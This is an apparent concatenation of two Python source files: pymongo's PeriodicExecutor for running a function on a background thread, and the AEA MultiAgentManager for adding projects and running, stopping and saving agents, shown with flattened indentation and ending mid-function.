periodic_executor.py
# Copyright 2014-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Run a target function on a background thread."""
import atexit
import threading
import time
import weakref
from pymongo.monotonic import time as _time
class PeriodicExecutor(object):
def __init__(self, interval, min_interval, target, name=None):
""""Run a target function periodically on a background thread.
If the target's return value is false, the executor stops.
:Parameters:
- `interval`: Seconds between calls to `target`.
- `min_interval`: Minimum seconds between calls if `wake` is
called very often.
- `target`: A function.
- `name`: A name to give the underlying thread.
"""
# threading.Event and its internal condition variable are expensive
# in Python 2, see PYTHON-983. Use a boolean to know when to wake.
# The executor's design is constrained by several Python issues, see
# "periodic_executor.rst" in this repository.
self._event = False
self._interval = interval
self._min_interval = min_interval
self._target = target
self._stopped = False
self._thread = None
self._name = name
def open(self):
"""Start. Multiple calls have no effect.
Not safe to call from multiple threads at once.
"""
self._stopped = False
started = False
try:
started = self._thread and self._thread.is_alive()
except ReferenceError:
# Thread terminated.
pass
if not started:
thread = threading.Thread(target=self._run, name=self._name)
thread.daemon = True
self._thread = weakref.proxy(thread)
_register_executor(self)
thread.start()
def close(self, dummy=None):
"""Stop. To restart, call open().
The dummy parameter allows an executor's close method to be a weakref
callback; see monitor.py.
"""
self._stopped = True
def join(self, timeout=None):
if self._thread is not None:
try:
self._thread.join(timeout)
except (ReferenceError, RuntimeError):
# Thread already terminated, or not yet started.
pass
def wake(self):
"""Execute the target function soon."""
self._event = True
def _run(self):
while not self._stopped:
try:
if not self._target():
self._stopped = True
break
except:
self._stopped = True
raise
deadline = _time() + self._interval
while not self._stopped and _time() < deadline:
time.sleep(self._min_interval)
if self._event:
break # Early wake.
self._event = False
# _EXECUTORS has a weakref to each running PeriodicExecutor. Once started,
# an executor is kept alive by a strong reference from its thread and perhaps
# from other objects. When the thread dies and all other referrers are freed,
# the executor is freed and removed from _EXECUTORS. If any threads are
# running when the interpreter begins to shut down, we try to halt and join
# them to avoid spurious errors.
_EXECUTORS = set()
def _register_executor(executor):
ref = weakref.ref(executor, _on_executor_deleted)
_EXECUTORS.add(ref)
def _on_executor_deleted(ref):
_EXECUTORS.remove(ref)
def _shutdown_executors():
if _EXECUTORS is None:
return
# Copy the set. Stopping threads has the side effect of removing executors.
executors = list(_EXECUTORS)
# First signal all executors to close...
for ref in executors:
executor = ref()
if executor:
executor.close()
# ...then try to join them.
for ref in executors:
executor = ref()
if executor:
executor.join(1)
executor = None
atexit.register(_shutdown_executors)
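# --------------------------------------------------------------------------
# Usage sketch (not part of the original module): a minimal example of how a
# PeriodicExecutor might be driven. The target function, the interval values
# and the thread name below are illustrative assumptions, not values used by
# pymongo itself.
if __name__ == "__main__":

    def _heartbeat():
        # Returning a truthy value keeps the executor running;
        # returning a falsy value makes it stop.
        print("heartbeat at", _time())
        return True

    executor = PeriodicExecutor(
        interval=2, min_interval=0.5, target=_heartbeat, name="demo-executor"
    )
    executor.open()   # start the background thread
    time.sleep(5)     # let a few heartbeats run
    executor.wake()   # request an early run of the target
    time.sleep(1)
    executor.close()  # signal the thread to stop
    executor.join(5)  # wait for it to exit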
manager.py
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the implementation of AEA agents manager."""
import asyncio
import datetime
import json
import multiprocessing
import os
import threading
from abc import ABC, abstractmethod
from asyncio.tasks import FIRST_COMPLETED
from collections import defaultdict
from multiprocessing.synchronize import Event
from shutil import rmtree
from threading import Thread
from traceback import format_exc
from typing import Any, Callable, Dict, List, Optional, Set, Tuple
from aea.aea import AEA
from aea.configurations.base import AgentConfig
from aea.configurations.constants import AEA_MANAGER_DATA_DIRNAME, DEFAULT_REGISTRY_NAME
from aea.configurations.data_types import PackageIdPrefix, PublicId
from aea.exceptions import enforce
from aea.helpers.io import open_file
from aea.manager.project import AgentAlias, Project
from aea.manager.utils import (
get_venv_dir_for_project,
project_check,
project_install_and_build,
run_in_venv,
)
class ProjectNotFoundError(ValueError):
"""Project not found exception."""
class ProjectCheckError(ValueError):
"""Project check error exception."""
def __init__(self, msg: str, source_exception: Exception):
"""Init exception."""
super().__init__(msg)
self.source_exception = source_exception
class ProjectPackageConsistencyCheckError(ValueError):
"""Check consistency of package versions against already added project."""
def __init__(
self,
agent_project_id: PublicId,
conflicting_packages: List[Tuple[PackageIdPrefix, str, str, Set[PublicId]]],
):
"""
Initialize the exception.
:param agent_project_id: the agent project id whose addition has failed.
:param conflicting_packages: the conflicting packages.
"""
self.agent_project_id = agent_project_id
self.conflicting_packages = conflicting_packages
super().__init__(self._build_error_message())
def _build_error_message(self) -> str:
"""Build the error message."""
conflicting_packages = sorted(self.conflicting_packages, key=str)
message = f"cannot add project '{self.agent_project_id}': the following AEA dependencies have conflicts with previously added projects:\n"
for (
(type_, author, name),
existing_version,
new_version,
agents,
) in conflicting_packages:
message += f"- '{author}/{name}' of type {type_}: the new version '{new_version}' conflicts with existing version '{existing_version}' of the same package required by agents: {list(agents)}\n"
return message
class BaseAgentRunTask(ABC):
"""Base abstract class for agent run tasks."""
@abstractmethod
def start(self) -> None:
"""Start task."""
@abstractmethod
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
@abstractmethod
def stop(self) -> None:
"""Stop task."""
@property
@abstractmethod
def is_running(self) -> bool:
"""Return is task running."""
class AgentRunAsyncTask(BaseAgentRunTask):
"""Async task wrapper for agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent alias and loop."""
self.agent = agent
self.run_loop: asyncio.AbstractEventLoop = loop
self.caller_loop: asyncio.AbstractEventLoop = loop
self._done_future: Optional[asyncio.Future] = None
self.task: Optional[asyncio.Task] = None
def create_run_loop(self) -> None:
"""Create run loop."""
def start(self) -> None:
"""Start task."""
self.create_run_loop()
self._done_future = asyncio.Future()
self.task = self.run_loop.create_task(self._run_wrapper())
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._done_future: # pragma: nocover
raise ValueError("Task not started!")
return self._done_future
def stop(self) -> None:
"""Stop task."""
if not self.run_loop or not self.task: # pragma: nocover
raise ValueError("Task was not started!")
self.run_loop.call_soon_threadsafe(self.task.cancel)
async def _run_wrapper(self) -> None:
"""Run task internals."""
if not self._done_future: # pragma: nocover
raise ValueError("Task was not started! please use start method")
exc = None
try:
await self.run()
except asyncio.CancelledError: # pragma: nocover
pass
except Exception as e: # pylint: disable=broad-except
exc = e
finally:
self.caller_loop.call_soon_threadsafe(self._set_result, exc)
def _set_result(self, exc: Optional[BaseException]) -> None:
"""Set result of task execution."""
if not self._done_future or self._done_future.done(): # pragma: nocover
return
if exc:
self._done_future.set_exception(exc)
else:
self._done_future.set_result(None)
async def run(self) -> None:
"""Run task body."""
self.agent.runtime.set_loop(self.run_loop)
await self.agent.runtime.run()
@property
def is_running(self) -> bool:
"""Return is task running."""
return not self.wait().done()
class AgentRunThreadTask(AgentRunAsyncTask):
"""Threaded wrapper to run agent."""
def __init__(self, agent: AEA, loop: asyncio.AbstractEventLoop) -> None:
"""Init task with agent alias and loop."""
AgentRunAsyncTask.__init__(self, agent, loop)
self._thread: Optional[Thread] = None
def create_run_loop(self) -> None:
"""Create run loop."""
self.run_loop = asyncio.new_event_loop()
def start(self) -> None:
"""Run task in a dedicated thread."""
super().start()
self._thread = threading.Thread(
target=self.run_loop.run_until_complete, args=[self.task], daemon=True
)
self._thread.start()
def stop(
self,
) -> None:
"""Stop the task."""
super().stop()
if self._thread is not None:
self._thread.join()
class AgentRunProcessTask(BaseAgentRunTask):
"""Subprocess wrapper to run agent."""
PROCESS_JOIN_TIMEOUT = 20 # in seconds
PROCESS_ALIVE_SLEEP_TIME = 0.005 # in seconds
def __init__( # pylint: disable=super-init-not-called
self, agent_alias: AgentAlias, loop: asyncio.AbstractEventLoop
) -> None:
"""Init task with agent alias and loop."""
self.caller_loop: asyncio.AbstractEventLoop = loop
self._manager = multiprocessing.Manager()
self._stop_event = self._manager.Event()
self.agent_alias = agent_alias
self.process: Optional[multiprocessing.Process] = None
self._wait_task: Optional[asyncio.Future] = None
self._result_queue = self._manager.Queue()
def start(self) -> None:
"""Run task in a dedicated process."""
self._wait_task = asyncio.ensure_future(
self._wait_for_result(), loop=self.caller_loop
)
self.process = multiprocessing.Process(
target=self._run_agent,
args=(self.agent_alias, self._stop_event, self._result_queue),
)
self.process.start()
async def _wait_for_result(self) -> Any:
"""Wait for the result of the function call."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
while self.process.is_alive():
await asyncio.sleep(self.PROCESS_ALIVE_SLEEP_TIME)
result = self._result_queue.get_nowait()
self.process.join(self.PROCESS_JOIN_TIMEOUT)
if isinstance(result, Exception):
raise result
return result
def wait(self) -> asyncio.Future:
"""Return future to wait task completed."""
if not self._wait_task:
raise ValueError("Task not started") # pragma: nocover
return self._wait_task
@staticmethod
def _run_agent(
agent_alias: AgentAlias,
stop_event: Event,
result_queue: multiprocessing.Queue,
) -> None:
"""Start an agent in a child process."""
t: Optional[Thread] = None
r: Optional[Exception] = None
run_stop_thread: bool = True
        # set a new event loop, because this is a new process
asyncio.set_event_loop(asyncio.new_event_loop())
try:
aea = agent_alias.get_aea_instance()
def stop_event_thread() -> None:
try:
while run_stop_thread:
if stop_event.wait(0.01) is True:
break
finally:
aea.runtime.stop()
t = Thread(target=stop_event_thread, daemon=True)
t.start()
loop = asyncio.get_event_loop()
aea.runtime.set_loop(loop)
aea.runtime.start()
loop.run_until_complete(aea.runtime.wait_completed())
except BaseException as e: # pylint: disable=broad-except
print(
f"Exception in agent subprocess task at {datetime.datetime.now()}:\n{format_exc()}"
)
r = Exception(str(e), repr(e))
finally:
run_stop_thread = False
if t:
t.join(10)
result_queue.put(r)
aea.logger.debug("process task stopped")
def stop(self) -> None:
"""Stop the task."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
self._stop_event.set()
self.process.join(self.PROCESS_JOIN_TIMEOUT)
if self.is_running: # pragma: nocover
self.process.terminate()
self.process.join(5)
raise ValueError(
f"process was not stopped within timeout: {self.PROCESS_JOIN_TIMEOUT} and was terminated"
)
@property
def is_running(self) -> bool:
"""Is agent running."""
if not self.process:
raise ValueError("Task not started!") # pragma: nocover
return self.process.is_alive()
ASYNC_MODE = "async"
THREADED_MODE = "threaded"
MULTIPROCESS_MODE = "multiprocess"
class MultiAgentManager:
"""Multi agents manager."""
MODES = [ASYNC_MODE, THREADED_MODE, MULTIPROCESS_MODE]
_MODE_TASK_CLASS = {
ASYNC_MODE: AgentRunAsyncTask,
THREADED_MODE: AgentRunThreadTask,
MULTIPROCESS_MODE: AgentRunProcessTask,
}
DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS = 60
VENV_BUILD_TIMEOUT = 240
SAVE_FILENAME = "save.json"
def __init__(
self,
working_dir: str,
mode: str = "async",
registry_path: str = DEFAULT_REGISTRY_NAME,
auto_add_remove_project: bool = False,
password: Optional[str] = None,
) -> None:
"""
Initialize manager.
:param working_dir: directory to store base agents.
        :param mode: str. One of 'async', 'threaded' or 'multiprocess'.
:param registry_path: str. path to the local packages registry
:param auto_add_remove_project: bool. add/remove project on the first agent add/last agent remove
:param password: the password to encrypt/decrypt the private key.
"""
self.working_dir = working_dir
self._auto_add_remove_project = auto_add_remove_project
self._save_path = os.path.join(self.working_dir, self.SAVE_FILENAME)
self.registry_path = registry_path
self._was_working_dir_created = False
self._is_running = False
self._projects: Dict[PublicId, Project] = {}
self._versionless_projects_set: Set[PublicId] = set()
self._data_dir = os.path.abspath(
os.path.join(self.working_dir, AEA_MANAGER_DATA_DIRNAME)
)
self._agents: Dict[str, AgentAlias] = {}
self._agents_tasks: Dict[str, BaseAgentRunTask] = {}
self._thread: Optional[Thread] = None
self._loop: Optional[asyncio.AbstractEventLoop] = None
self._event: Optional[asyncio.Event] = None
self._error_callbacks: List[Callable[[str, BaseException], None]] = [
self._default_error_callback
]
self._custom_callback_added: bool = False
self._last_start_status: Optional[
Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]
] = None
if mode not in self.MODES:
raise ValueError(
f'Invalid mode {mode}. Valid modes are {", ".join(self.MODES)}'
)
self._started_event = threading.Event()
self._mode = mode
self._password = password
        # This dict tracks whether we have already printed the warning message
# for a certain agent
self._warning_message_printed_for_agent: Dict[str, bool] = {}
# the dictionary keeps track of the AEA packages used across
# AEA projects in the same MAM.
# It maps package prefixes to a pair: (version, agent_ids)
# where agent_ids is the set of agent ids whose projects
# have the package in the key at the specific version.
self._package_id_prefix_to_version: Dict[
PackageIdPrefix, Tuple[str, Set[PublicId]]
] = {}
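        # Illustrative (hypothetical) entry of this mapping, following the
        # description above; the author, package and version are made up:
        #   {(<component type>, "author", "package_name"):
        #        ("0.1.0", {PublicId("author", "some_agent", "0.1.0")})}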
@property
def data_dir(self) -> str:
"""Get the certs directory."""
return self._data_dir
def get_data_dir_of_agent(self, agent_name: str) -> str:
"""Get the data directory of a specific agent."""
return os.path.join(self.data_dir, agent_name)
@property
def is_running(self) -> bool:
"""Is manager running."""
return self._is_running
@property
def dict_state(self) -> Dict[str, Any]:
"""Create MultiAgentManager dist state."""
return {
"projects": [str(public_id) for public_id in self._projects.keys()],
"agents": [alias.dict for alias in self._agents.values()],
}
@property
def projects(self) -> Dict[PublicId, Project]:
"""Get all projects."""
return self._projects
def _run_thread(self) -> None:
"""Run internal thread with own event loop."""
self._loop = asyncio.new_event_loop()
self._loop.run_until_complete(self._manager_loop())
async def _manager_loop(self) -> None:
"""Await and control running manager."""
self._event = asyncio.Event()
self._started_event.set()
while self._is_running:
agents_run_tasks_futures = {
task.wait(): agent_name
for agent_name, task in self._agents_tasks.items()
}
wait_tasks = [
asyncio.ensure_future(i)
for i in [*agents_run_tasks_futures.keys(), self._event.wait()]
]
done, _ = await asyncio.wait(wait_tasks, return_when=FIRST_COMPLETED)
if self._event.is_set():
self._event.clear()
for task in done:
if task not in agents_run_tasks_futures:
# task not in agents_run_tasks_futures, so it's event_wait, skip it
await task
continue
agent_name = agents_run_tasks_futures[task]
self._agents_tasks.pop(agent_name)
if task.exception():
for callback in self._error_callbacks:
callback(agent_name, task.exception()) # type: ignore
else:
await task
def add_error_callback(
self, error_callback: Callable[[str, BaseException], None]
) -> "MultiAgentManager":
"""Add error callback to call on error raised."""
if len(self._error_callbacks) == 1 and not self._custom_callback_added:
# only default callback present, reset before adding new callback
self._custom_callback_added = True
self._error_callbacks = []
self._error_callbacks.append(error_callback)
return self
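    # Usage sketch (illustrative, not part of the original API docs); the
    # callback name below is hypothetical:
    #
    #     def on_agent_error(agent_name: str, exc: BaseException) -> None:
    #         print(f"agent {agent_name} failed: {exc!r}")
    #
    #     manager.add_error_callback(on_agent_error)
    #
    # Adding a custom callback replaces the default warning-printing callback.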
def start_manager(
self, local: bool = False, remote: bool = False
) -> "MultiAgentManager":
"""
Start manager.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: the MultiAgentManager instance.
"""
if self._is_running:
return self
self._ensure_working_dir()
self._last_start_status = self._load_state(local=local, remote=remote)
self._started_event.clear()
self._is_running = True
self._thread = Thread(target=self._run_thread, daemon=True)
self._thread.start()
self._started_event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
return self
@property
def last_start_status(
self,
) -> Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]:
"""Get status of the last agents start loading state."""
if self._last_start_status is None:
raise ValueError("Manager was not started")
return self._last_start_status
def stop_manager(
self, cleanup: bool = True, save: bool = False
) -> "MultiAgentManager":
"""
Stop manager.
        Stops all running agents and the manager.
:param cleanup: bool is cleanup on stop.
:param save: bool is save state to file on stop.
        :return: self
"""
if not self._is_running:
return self
if not self._loop or not self._event or not self._thread: # pragma: nocover
raise ValueError("Manager was not started!")
if not self._thread.is_alive(): # pragma: nocover
return self
self.stop_all_agents()
if save:
self._save_state()
for agent_name in self.list_agents():
self.remove_agent(agent_name, skip_project_auto_remove=True)
if cleanup:
for project in list(self._projects.keys()):
self.remove_project(project, keep_files=save)
self._cleanup(only_data=save)
self._is_running = False
self._loop.call_soon_threadsafe(self._event.set)
if self._thread.ident != threading.get_ident():
self._thread.join(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
self._thread = None
self._warning_message_printed_for_agent = {}
return self
def _cleanup(self, only_data: bool = False) -> None:
"""Remove workdir if was created."""
if only_data:
rmtree(self.data_dir)
else:
if self._was_working_dir_created and os.path.exists(self.working_dir):
rmtree(self.working_dir)
def add_project(
self,
public_id: PublicId,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
        :param public_id: the public id of the agent project.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: self
"""
if public_id.to_any() in self._versionless_projects_set:
raise ValueError(
f"The project ({public_id.author}/{public_id.name}) was already added!"
)
project = Project.load(
self.working_dir,
public_id,
local,
remote,
registry_path=self.registry_path,
is_restore=restore,
skip_aea_validation=False,
)
if not restore:
self._project_install_and_build(project)
self._check_version_consistency(project.agent_config)
try:
self._check_project(project)
except Exception as e:
project.remove()
raise ProjectCheckError(
f"Failed to load project: {public_id} Error: {str(e)}", e
)
self._add_new_package_versions(project.agent_config)
self._versionless_projects_set.add(public_id.to_any())
self._projects[public_id] = project
return self
def _project_install_and_build(self, project: Project) -> None:
"""Build and install project dependencies."""
if self._mode == MULTIPROCESS_MODE:
venv_dir = get_venv_dir_for_project(project)
run_in_venv(
venv_dir, project_install_and_build, self.VENV_BUILD_TIMEOUT, project
)
else:
venv_dir = get_venv_dir_for_project(project)
project_install_and_build(project)
def _check_project(self, project: Project) -> None:
if self._mode == MULTIPROCESS_MODE:
venv_dir = get_venv_dir_for_project(project)
run_in_venv(venv_dir, project_check, 120, project)
else:
project_check(project)
def remove_project(
self, public_id: PublicId, keep_files: bool = False
) -> "MultiAgentManager":
"""Remove agent project."""
if public_id not in self._projects:
raise ValueError(f"Project {public_id} is not present!")
if self._projects[public_id].agents:
raise ValueError(
f"Can not remove projects with aliases exists: {self._projects[public_id].agents}"
)
project = self._projects.pop(public_id)
self._remove_package_versions(project.agent_config)
self._versionless_projects_set.remove(public_id.to_any())
if not keep_files:
project.remove()
return self
def list_projects(self) -> List[PublicId]:
"""
List all agents projects added.
:return: list of public ids of projects
"""
return list(self._projects.keys())
def add_agent(
self,
public_id: PublicId,
agent_name: Optional[str] = None,
agent_overrides: Optional[dict] = None,
component_overrides: Optional[List[dict]] = None,
local: bool = False,
remote: bool = False,
restore: bool = False,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config overrides applied.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param agent_overrides: overrides for agent config.
:param component_overrides: overrides for component section.
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:param restore: bool flag for restoring already fetched agent.
:return: self
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents:
raise ValueError(f"Agent with name {agent_name} already exists!")
project = self._projects.get(public_id, None)
if project is None and self._auto_add_remove_project:
self.add_project(public_id, local, remote, restore)
project = self._projects.get(public_id, None)
if project is None:
raise ProjectNotFoundError(f"{public_id} project is not added!")
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_overrides(agent_overrides, component_overrides)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def add_agent_with_config(
self,
public_id: PublicId,
config: List[dict],
agent_name: Optional[str] = None,
) -> "MultiAgentManager":
"""
Create new agent configuration based on project with config provided.
Alias is stored in memory only!
:param public_id: base agent project public id
:param agent_name: unique name for the agent
:param config: agent config (used for agent re-creation).
:return: manager
"""
agent_name = agent_name or public_id.name
if agent_name in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} already exists!")
if public_id not in self._projects: # pragma: nocover
raise ValueError(f"{public_id} project is not added!")
project = self._projects[public_id]
agent_alias = AgentAlias(
project=project,
agent_name=agent_name,
data_dir=self.get_data_dir_of_agent(agent_name),
password=self._password,
)
agent_alias.set_agent_config_from_data(config)
project.agents.add(agent_name)
self._agents[agent_name] = agent_alias
return self
def get_agent_overridables(self, agent_name: str) -> Tuple[Dict, List[Dict]]:
"""
Get agent config overridables.
:param agent_name: str
        :return: Tuple of agent overridables dict and list of component overridables dicts.
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name].get_overridables()
def set_agent_overrides(
self,
agent_name: str,
agent_overides: Optional[Dict],
components_overrides: Optional[List[Dict]],
) -> "MultiAgentManager":
"""
Set agent overrides.
:param agent_name: str
:param agent_overides: optional dict of agent config overrides
:param components_overrides: optional list of dict of components overrides
:return: self
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name): # pragma: nocover
raise ValueError("Agent is running. stop it first!")
self._agents[agent_name].set_overrides(agent_overides, components_overrides)
return self
def list_agents_info(self) -> List[Dict[str, Any]]:
"""
List agents detailed info.
:return: list of dicts that represents agent info: public_id, name, is_running.
"""
return [
{
"agent_name": agent_name,
"public_id": str(alias.project.public_id),
"addresses": alias.get_addresses(),
"is_running": self._is_agent_running(agent_name),
}
for agent_name, alias in self._agents.items()
]
def list_agents(self, running_only: bool = False) -> List[str]:
"""
List all agents.
:param running_only: returns only running if set to True
:return: list of agents names
"""
if running_only:
return [i for i in self._agents.keys() if self._is_agent_running(i)]
return list(self._agents.keys())
def remove_agent(
self, agent_name: str, skip_project_auto_remove: bool = False
) -> "MultiAgentManager":
"""
Remove agent alias definition from registry.
:param agent_name: agent name to remove
:param skip_project_auto_remove: disable auto project remove on last agent removed.
        :return: self
"""
if agent_name not in self._agents:
raise ValueError(f"Agent with name {agent_name} does not exist!")
if self._is_agent_running(agent_name):
raise ValueError("Agent is running. stop it first!")
agent_alias = self._agents.pop(agent_name)
agent_alias.remove_from_project()
project: Project = agent_alias.project
if (
not project.agents
and self._auto_add_remove_project
and not skip_project_auto_remove
):
self.remove_project(project.public_id, keep_files=False)
return self
def start_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Start selected agent.
:param agent_name: agent name to start
        :return: self
"""
if not self._loop or not self._event: # pragma: nocover
raise ValueError("agent is not started!")
agent_alias = self._agents.get(agent_name)
if not agent_alias:
raise ValueError(f"{agent_name} is not registered!")
if self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is already started!")
event = threading.Event()
self._loop.call_soon_threadsafe(
self._make_agent_task, agent_name, agent_alias, event
)
event.wait(30) # if something goes wrong
del event
self._loop.call_soon_threadsafe(self._event.set)
return self
def _make_agent_task(
self, agent_name: str, agent_alias: AgentAlias, event: threading.Event
) -> None:
"""Create and start agent task."""
task_cls = self._MODE_TASK_CLASS[self._mode]
if self._mode == MULTIPROCESS_MODE:
task = task_cls(agent_alias, self._loop)
else:
agent = agent_alias.get_aea_instance()
task = task_cls(agent, self._loop)
self._agents_tasks[agent_name] = task
task.start()
event.set()
def _is_agent_running(self, agent_name: str) -> bool:
"""Return is agent task in running state."""
if agent_name not in self._agents_tasks:
return False
task = self._agents_tasks[agent_name]
return task.is_running
def start_all_agents(self) -> "MultiAgentManager":
"""
        Start all agents that are not already running.
        :return: self
"""
self.start_agents(
[
agent_name
for agent_name in self.list_agents()
if not self._is_agent_running(agent_name)
]
)
return self
def stop_agent(self, agent_name: str) -> "MultiAgentManager":
"""
Stop running agent.
:param agent_name: agent name to stop
:return: self
"""
if not self._is_agent_running(agent_name) or not self._thread or not self._loop:
raise ValueError(f"{agent_name} is not running!")
agent_task = self._agents_tasks[agent_name]
if self._thread.ident == threading.get_ident(): # pragma: nocover
# In same thread do not perform blocking operations!
agent_task.stop()
return self
wait_future = agent_task.wait()
event = threading.Event()
def event_set(*args: Any) -> None: # pylint: disable=unused-argument
event.set()
def _add_cb() -> None:
if wait_future.done():
event_set() # pragma: nocover
else:
wait_future.add_done_callback(event_set) # pragma: nocover
self._loop.call_soon_threadsafe(_add_cb)
agent_task.stop()
event.wait(self.DEFAULT_TIMEOUT_FOR_BLOCKING_OPERATIONS)
if agent_task.is_running: # pragma: nocover
raise ValueError(f"cannot stop task of agent {agent_name}")
return self
def stop_all_agents(self) -> "MultiAgentManager":
"""
Stop all agents running.
:return: self
"""
agents_list = self.list_agents(running_only=True)
self.stop_agents(agents_list)
return self
def stop_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
Stop specified agents.
:param agent_names: names of agents
:return: self
"""
for agent_name in agent_names:
if not self._is_agent_running(agent_name):
raise ValueError(f"{agent_name} is not running!")
for agent_name in agent_names:
self.stop_agent(agent_name)
return self
def start_agents(self, agent_names: List[str]) -> "MultiAgentManager":
"""
        Start specified agents.
:param agent_names: names of agents
:return: self
"""
for agent_name in agent_names:
self.start_agent(agent_name)
return self
def get_agent_alias(self, agent_name: str) -> AgentAlias:
"""
Return details about agent alias definition.
:param agent_name: name of agent
:return: AgentAlias
"""
if agent_name not in self._agents: # pragma: nocover
raise ValueError(f"Agent with name {agent_name} does not exist!")
return self._agents[agent_name]
def _ensure_working_dir(self) -> None:
"""Create working dir if needed."""
if not os.path.exists(self.working_dir):
os.makedirs(self.working_dir)
self._was_working_dir_created = True
if not os.path.isdir(self.working_dir): # pragma: nocover
raise ValueError(f"{self.working_dir} is not a directory!")
if not os.path.exists(self.data_dir):
os.makedirs(self.data_dir)
def _load_state(
self, local: bool, remote: bool
) -> Tuple[
bool,
Dict[PublicId, List[Dict]],
List[Tuple[PublicId, List[Dict], Exception]],
]:
"""
Load saved state from file.
Fetch agent project and all dependencies to working_dir.
If local = False and remote = False, then the packages
are fetched in mixed mode (i.e. first try from local
registry, and then from remote registry in case of failure).
:param local: whether or not to fetch from local registry.
:param remote: whether or not to fetch from remote registry.
:return: Tuple of bool indicating load success, settings of loaded, list of failed
:raises: ValueError if failed to load state.
"""
if not os.path.exists(self._save_path):
return False, {}, []
save_json = {}
with open_file(self._save_path) as f:
save_json = json.load(f)
if not save_json:
return False, {}, [] # pragma: nocover
projects_agents: Dict[PublicId, List] = defaultdict(list)
for agent_settings in save_json["agents"]:
projects_agents[PublicId.from_str(agent_settings["public_id"])].append(
agent_settings
)
failed_to_load: List[Tuple[PublicId, List[Dict], Exception]] = []
loaded_ok: Dict[PublicId, List[Dict]] = {}
for project_public_id, agents_settings in projects_agents.items():
try:
self.add_project(
project_public_id,
local=local,
remote=remote,
restore=True,
)
except ProjectCheckError as e:
failed_to_load.append((project_public_id, agents_settings, e))
break
for agent_settings in agents_settings:
self.add_agent_with_config(
public_id=PublicId.from_str(agent_settings["public_id"]),
agent_name=agent_settings["agent_name"],
config=agent_settings["config"],
)
loaded_ok[project_public_id] = agents_settings
return True, loaded_ok, failed_to_load
def _save_state(self) -> None:
"""Save MultiAgentManager state."""
with open_file(self._save_path, "w") as f:
json.dump(self.dict_state, f, indent=4, sort_keys=True)
def _default_error_callback(
self, agent_name: str, exception: BaseException
) -> None:
"""
Handle errors from running agents.
This is the default error callback. To replace it
with another one, use the method 'add_error_callback'.
:param agent_name: the agent name
:param exception: the caught exception
"""
self._print_exception_occurred_but_no_error_callback(agent_name, exception)
def _print_exception_occurred_but_no_error_callback(
self, agent_name: str, exception: BaseException
) -> None:
"""
Print a warning message when an exception occurred but no error callback is registered.
:param agent_name: the agent name.
:param exception: the caught exception.
"""
if self._warning_message_printed_for_agent.get(agent_name, False):
return # pragma: nocover
self._warning_message_printed_for_agent[agent_name] = True
print(
f"WARNING: An exception occurred during the execution of agent '{agent_name}':\n",
str(exception),
repr(exception),
"\nHowever, since no error callback was found the exception is handled silently. Please "
"add an error callback using the method 'add_error_callback' of the MultiAgentManager instance.",
)
def _check_version_consistency(self, agent_config: AgentConfig) -> None:
"""
Check that the agent dependencies in input are consistent with the other projects.
:param agent_config: the agent configuration we are going to add.
:return: None
:raises ProjectPackageConsistencyCheckError: if a version conflict is detected.
"""
existing_packages = set(self._package_id_prefix_to_version.keys())
prefix_to_version = {
component_id.component_prefix: component_id.version
for component_id in agent_config.package_dependencies
}
component_prefixes_to_be_added = set(prefix_to_version.keys())
potentially_conflicting_packages = existing_packages.intersection(
component_prefixes_to_be_added
)
if len(potentially_conflicting_packages) == 0:
return
# conflicting_packages is a list of tuples whose elements are:
# - package id prefix: the triple (component type, author, name)
# - current_version: the version currently present in the MAM, across all projects
# - new_version: the version of the package in the new project
# - agents: the set of agents in the MAM that have the package;
# used to provide a better error message
